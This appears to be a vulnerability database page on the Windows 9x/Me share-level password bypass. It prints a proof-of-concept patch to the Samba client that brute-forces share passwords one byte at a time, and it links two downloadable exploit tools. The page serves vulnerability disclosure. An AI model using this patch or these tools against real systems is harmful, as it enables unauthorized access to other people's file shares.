• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• RSS
• News
• Vulns
• Product Search

• info
• discussion
• exploit
• solution
• references

Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability

Nsfocus <security@nsfocus.com> has released the following proof-of-concept code:

--- samba-2.0.6.orig/source/client/client.c Thu Nov 11 10:35:59 1999
+++ samba-2.0.6/source/client/client.c Mon Sep 18 21:20:29 2000
@@ -1961,12 +1961,22 @@ struct cli_state *do_connect(char *serve

DEBUG(4,(" session setup ok\n"));

+/*
if (!cli_send_tconX(c, share, "?????",
password, strlen(password)+1)) {
DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
cli_shutdown(c);
return NULL;
}
+*/
+
+ password[0] = 0;
+ c->sec_mode = 0;
+ do{
+
+ password[0]+=1;
+
+ }while(!cli_send_tconX(c, share, "?????", password, 1));

DEBUG(4,(" tconx ok\n"));

Björn Stickler <stickler@rbg.informatik.tu-darmstadt.de> has released the following sharehack2.zip for the password verfication exploit discovered by Nsfocus Security Team. The program hacks every win9x/me share password in less than 2 minutes, 10 minutes for internet (c sourcecode included)

Gabriel Maggiotti <gmaggiot@ciudad.com.ar> has provided the following exploit:

netbios.tar.gz

• /data/vulnerabilities/exploits/sharehack2.zip
• /data/vulnerabilities/exploits/netbios.tar.gz